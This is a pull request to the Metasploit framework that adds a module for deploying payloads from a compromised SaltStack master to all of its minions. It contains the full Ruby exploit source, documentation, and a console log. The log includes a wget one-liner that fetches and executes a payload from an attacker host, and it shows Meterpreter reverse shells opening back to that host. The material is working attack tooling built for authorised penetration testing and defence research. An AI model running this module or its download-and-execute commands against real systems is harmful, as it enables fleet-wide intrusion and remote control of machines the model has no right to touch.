### PR TITLE
Saltstack salt minion deployer

### DIFF
--- a/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
+++ b/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
@@ -1,0 +1,121 @@
+## Vulnerable Application
+
+This exploit module uses saltstack salt to deploy a payload and run it
+on all targets which have been selected (default all).
+Currently only works against nix targets.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use exploit/linux/local/saltstack_salt_minion_deployer`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get sessions on all the targeted hosts
+
+## Options
+
+### SALT
+
+Location of salt-master executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/bin/salt-master`. Defaults to ``
+
+### MINIONS
+
+Which minions to target. Defaults to `*`
+
+## WritableDir
+
+A directory on the compromised host we can write our payload to. Defaults to `/tmp`
+
+## TargetWritableDir
+
+A directory on the target hosts we can write our payload to. Defaults to `/tmp`
+
+## CALCULATE
+
+This will calculate how many hosts may be exploitable by using Ansible's ping command.
+
+### ListenerTimeout
+
+How many seconds to wait after executing the payload for hosts to call back. Defaults to `60`
+
+## Scenarios
+
+### Minion 3002.2 on Ubuntu 20.04
+
+Get initial access to the system. In this case, root was required to execute salt commands successfully.
+
+```
+resource (salt_deploy.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (salt_deploy.rb)> set srvport 8181
+srvport => 8181
+resource (salt_deploy.rb)> set target 7
+target => 7
+resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/hvy2Ol
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown
+[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 3.3.3.3
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500
+```
+
+```
+resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> set session 1
+session => 1
+resource (salt_deploy.rb)> set verbose true
+verbose => true
+resource (salt_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (salt_deploy.rb)> set lport 9996
+lport => 9996
+[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) > 
+
+[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > 
+[*] Started reverse TCP handler on 1.1.1.1:9996 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] /tmp is writable, and salt-master executable found
+[+] The target is vulnerable.
+[*] Attempting to list minions
+[*] minions:
+- mac_minion
+- salt-minion
+- window-salt-minion
+minions_denied: []
+minions_pre: []
+minions_rejected: []
+[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml
+[+] Minions List
+============
+
+ Status    Minion Name
+ ------    -----------
+ Accepted  mac_minion
+ Accepted  salt-minion
+ Accepted  window-salt-minion
+
+[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
+[*] Writing '/tmp/E76Azw' (336 bytes) ...
+[*] Copying payload to minions
+
+[*] Executing payloads
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500
+```

--- a/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
+++ b/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
@@ -31,7 +31,7 @@ A directory on the compromised host we can write our payload to. Defaults to `/t
 
 ## TargetWritableDir
 
-A directory on the target hosts we can write our payload to. Defaults to `/tmp`
+A directory on the target hosts we can write and execute our payload to. Defaults to `/tmp`
 
 ## CALCULATE
 

--- a/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
+++ b/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
@@ -19,7 +19,7 @@ Currently only works against nix targets.
 ### SALT
 
 Location of salt-master executable if not in a standard location. This is added to a list of default locations
-which includes `/usr/bin/salt-master`. Defaults to ``
+which includes `/usr/bin/salt-master`, `/usr/bin/local/salt-master`. Defaults to ``
 
 ### MINIONS
 

--- a/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
+++ b/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
@@ -4,6 +4,10 @@ This exploit module uses saltstack salt to deploy a payload and run it
 on all targets which have been selected (default all).
 Currently only works against nix targets.
 
+### Vulnerable Host
+
+A vulnerable host install can be found in this [Docker environment](https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-11651/docker-compose.yml).
+
 ## Verification Steps
 
 1. Install the application
@@ -19,7 +23,7 @@ Currently only works against nix targets.
 ### SALT
 
 Location of salt-master executable if not in a standard location. This is added to a list of default locations
-which includes `/usr/bin/salt-master`, `/usr/bin/local/salt-master`. Defaults to ``
+which includes `/usr/bin/salt-master`, `/usr/local/bin/salt-master`. Defaults to ``
 
 ### MINIONS
 

--- a/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
+++ b/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
@@ -29,21 +29,22 @@ which includes `/usr/bin/salt-master`, `/usr/local/bin/salt-master`. Defaults to
 
 Which minions to target. Defaults to `*`
 
-## WritableDir
+### WritableDir
 
 A directory on the compromised host we can write our payload to. Defaults to `/tmp`
 
-## TargetWritableDir
+### TargetWritableDir
 
 A directory on the target hosts we can write and execute our payload to. Defaults to `/tmp`
 
-## CALCULATE
+### CALCULATE
 
 This will calculate how many hosts may be exploitable by using Ansible's ping command.
 
 ### ListenerTimeout
 
-How many seconds to wait after executing the payload for hosts to call back. Defaults to `60`
+How many seconds to wait after executing the payload for hosts to call back.
+If set to `0`, wait forever. Defaults to `60`
 
 ## Scenarios
 

--- a/lib/msf/core/exploit/local/saltstack.rb
+++ b/lib/msf/core/exploit/local/saltstack.rb
@@ -1,0 +1,27 @@
+require 'yaml'
+
+module Msf
+    module Exploit::Local::Saltstack
+        def list_minions(salt_key_exe='salt-key')
+            # pull minions from a master, returns hash of lists of the output
+            print_status('Attempting to list minions')
+            unless command_exists?(salt_key_exe)
+              print_error('salt-key not present on system')
+              return
+            end
+        
+            begin
+              out = cmd_exec(salt_key_exe, '-L --output=yaml', datastore['TIMEOUT'])
+              vprint_status(out)
+              minions = YAML.safe_load(out)
+            rescue Psych::SyntaxError
+              print_error('Unable to load salt-key -L data')
+              return
+            end
+
+            store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+            print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+            minions
+          end
+    end
+end

--- a/lib/msf/core/exploit/local/saltstack.rb
+++ b/lib/msf/core/exploit/local/saltstack.rb
@@ -1,27 +1,33 @@
 require 'yaml'
 
 module Msf
-    module Exploit::Local::Saltstack
-        def list_minions(salt_key_exe='salt-key')
-            # pull minions from a master, returns hash of lists of the output
-            print_status('Attempting to list minions')
-            unless command_exists?(salt_key_exe)
-              print_error('salt-key not present on system')
-              return
-            end
-        
-            begin
-              out = cmd_exec(salt_key_exe, '-L --output=yaml', datastore['TIMEOUT'])
-              vprint_status(out)
-              minions = YAML.safe_load(out)
-            rescue Psych::SyntaxError
-              print_error('Unable to load salt-key -L data')
-              return
-            end
+  module Exploit::Local::Saltstack
+    #
+    # lists minions using the salt-key command.
+    #
+    # @param salt_key_exe [String] The name location of the salt-key executable
+    # @return [YAML] YAML document with the minions listed
+    #
+    def list_minions(salt_key_exe = 'salt-key')
+      # pull minions from a master, returns hash of lists of the output
+      print_status('Attempting to list minions')
+      unless command_exists?(salt_key_exe)
+        print_error('salt-key not present on system')
+        return
+      end
 
-            store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
-            print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
-            minions
-          end
+      begin
+        out = cmd_exec(salt_key_exe, '-L --output=yaml', datastore['TIMEOUT'])
+        vprint_status(out)
+        minions = YAML.safe_load(out)
+      rescue Psych::SyntaxError
+        print_error('Unable to load salt-key -L data')
+        return
+      end
+
+      store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+      print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+      minions
     end
+  end
 end

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -63,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
       next unless executable?(exec)
 
       @salt = exec
+      return @salt
     end
     @salt
   end

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Saltstack Minion Payload Deployer',
+        'Description' => %q{
+          This exploit module uses saltstack salt to deploy a payload and run it
+          on all targets which have been selected (default all).
+          Currently only works against nix targets.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'c2Vlcgo'
+        ],
+        'Platform' => [ 'linux', 'unix' ],
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [],
+        'DisclosureDate' => '2011-03-19', # saltstack salt original release date
+        'DefaultTarget' => 0,
+        'Passive' => true, # this allows us to get multiple shells calling home
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('SALT', [true, 'salt-master executable location', '']),
+      OptString.new('MINIONS', [true, 'Minions Target', '*']),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
+      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
+      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),
+      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run', 120])
+    ]
+  end
+
+  def salt_master
+    return @salt if @salt
+
+    ['/usr/bin/salt-master', datastore['SALT']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @salt = exec
+    end
+    @salt
+  end
+
+  # taken from saltstack_salt.rb module
+  def list_minions
+    # pull minions from a master
+    print_status('Attempting to list minions')
+    unless command_exists?('salt-key')
+      print_error('salt-key not present on system')
+      return
+    end
+
+    count = 0
+
+    begin
+      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
+      vprint_status(out)
+      minions = YAML.safe_load(out)
+    rescue Psych::SyntaxError
+      print_error('Unable to load salt-key -L data')
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Minions List',
+      'Indent' => 1,
+      'Columns' => ['Status', 'Minion Name']
+    )
+
+    store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+    print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+    minions['minions'].each do |minion|
+      tbl << ['Accepted', minion]
+      count += 1
+    end
+
+    print_good(tbl.to_s)
+    print_good("#{count} minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+    Rex.sleep(10)
+  end
+
+  def check
+    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?
+
+    if writable?(datastore['WritableDir'])
+      vprint_good("#{datastore['WritableDir']} is writable, and salt-master executable found")
+      return CheckCode::Vulnerable
+    end
+    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
+  end
+
+  def exploit
+    # Make sure we can write our exploit and payload to the local system
+    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
+    list_minions if datastore['CALCULATE']
+
+    payload_name = rand_text_alphanumeric(5..10)
+
+    # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899
+    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe)
+
+    print_status('Copying payload to minions')
+    cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'")
+    print_status('Executing payloads')
+    cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'")
+
+    # stolen from exploit/multi/handler
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
+    end
+  end
+
+  def on_new_session(_session)
+    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
+
+    begin
+      print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")
+      cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")
+      print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")
+    rescue StandardError
+      print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")
+    end
+  end
+
+end

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -108,11 +108,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?
 
-    if writable?(datastore['WritableDir'])
-      vprint_good("#{datastore['WritableDir']} is writable, and salt-master executable found")
-      return CheckCode::Vulnerable
-    end
-    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
+    CheckCode::Vulnerable('salt-master executable found')
   end
 
   def exploit
@@ -141,6 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def on_new_session(_session)
+    super
     cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
 
     begin

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options [
-      OptString.new('SALT', [true, 'salt-master executable location', '/usr/bin/salt-master']),
+      OptString.new('SALT', [true, 'salt-master executable location', '']),
       OptString.new('MINIONS', [true, 'Minions Target', '*']),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
       OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
   def salt_master
     return @salt if @salt
 
-    [datastore['SALT'], '/usr/bin/salt-master'].each do |exec|
+    [datastore['SALT'], '/usr/bin/salt-master', '/usr/bin/local/salt-master'].each do |exec|
       next unless executable?(exec)
 
       @salt = exec

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    register_advanced_options [
+    register_options [
       OptString.new('SALT', [true, 'salt-master executable location', '']),
       OptString.new('MINIONS', [true, 'Minions Target', '*']),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Local::Saltstack
 
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
   def salt_master
     return @salt if @salt
 
-    ['/usr/bin/salt-master', datastore['SALT']].each do |exec|
+    [datastore['SALT'], '/usr/bin/salt-master'].each do |exec|
       next unless executable?(exec)
 
       @salt = exec
@@ -66,23 +67,9 @@ class MetasploitModule < Msf::Exploit::Local
     @salt
   end
 
-  # taken from saltstack_salt.rb module
-  def list_minions
-    # pull minions from a master
-    print_status('Attempting to list minions')
-    unless command_exists?('salt-key')
-      print_error('salt-key not present on system')
-      return
-    end
-
-    begin
-      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
-      vprint_status(out)
-      minions = YAML.safe_load(out)
-    rescue Psych::SyntaxError
-      print_error('Unable to load salt-key -L data')
-      return
-    end
+  def list_minions_printer
+    minions = list_minions
+    return if minions.nil?
 
     tbl = Rex::Text::Table.new(
       'Header' => 'Minions List',
@@ -90,8 +77,6 @@ class MetasploitModule < Msf::Exploit::Local
       'Columns' => ['Status', 'Minion Name']
     )
 
-    store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
-    print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
     count = 0
     minions['minions'].each do |minion|
       tbl << ['Accepted', minion]
@@ -114,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Make sure we can write our exploit and payload to the local system
     fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
-    list_minions if datastore['CALCULATE']
+    list_minions_printer if datastore['CALCULATE']
 
     payload_name = rand_text_alphanumeric(5..10)
 

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -45,13 +45,13 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options [
-      OptString.new('SALT', [true, 'salt-master executable location', '']),
+      OptString.new('SALT', [true, 'salt-master executable location', '/usr/bin/salt-master']),
       OptString.new('MINIONS', [true, 'Minions Target', '*']),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-      OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
+      OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),
       OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
       OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),
-      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run', 120])
+      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120])
     ]
   end
 
@@ -59,7 +59,6 @@ class MetasploitModule < Msf::Exploit::Local
     return @salt if @salt
 
     ['/usr/bin/salt-master', datastore['SALT']].each do |exec|
-      next unless file?(exec)
       next unless executable?(exec)
 
       @salt = exec
@@ -75,8 +74,6 @@ class MetasploitModule < Msf::Exploit::Local
       print_error('salt-key not present on system')
       return
     end
-
-    count = 0
 
     begin
       out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
@@ -95,13 +92,16 @@ class MetasploitModule < Msf::Exploit::Local
 
     store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
     print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+    count = 0
     minions['minions'].each do |minion|
       tbl << ['Accepted', minion]
       count += 1
     end
 
     print_good(tbl.to_s)
-    print_good("#{count} minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+
+    # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017
+    print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")
     Rex.sleep(10)
   end
 

--- a/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
+++ b/modules/exploits/linux/local/saltstack_salt_minion_deployer.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
   def salt_master
     return @salt if @salt
 
-    [datastore['SALT'], '/usr/bin/salt-master', '/usr/bin/local/salt-master'].each do |exec|
+    [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec|
       next unless executable?(exec)
 
       @salt = exec
@@ -88,6 +88,7 @@ class MetasploitModule < Msf::Exploit::Local
     # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017
     print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")
     Rex.sleep(10)
+    count
   end
 
   def check
@@ -99,7 +100,9 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Make sure we can write our exploit and payload to the local system
     fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
-    list_minions_printer if datastore['CALCULATE']
+    count = 1 # default to running if we decide not to calculate
+    count = list_minions_printer if datastore['CALCULATE']
+    fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0
 
     payload_name = rand_text_alphanumeric(5..10)
 


### PR DESCRIPTION
Back in #15113 we had planned to create a follow on module to deploy payloads to the minions.  Apparently that fell off both @c2Vlcgo and my radars. This circles back to complete that.

This PR creates a new exploitation module that when used on a saltstack salt master will deploy a payload to minions

This is part 1 of my new Raining Shells series ![raining blood](https://media1.tenor.com/m/C7RUc1MyyDcAAAAC/slayer-slayer-fan.gif)

## Verification

List the steps needed to make sure this thing works

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Get an initial shell on the box
- [ ] Do: `use exploit/linux/local/saltstack_salt_minion_deployer`
- [ ] Do: `set session [#]`
- [ ] Do: `run`
- [ ] You should get sessions on all the targeted hosts
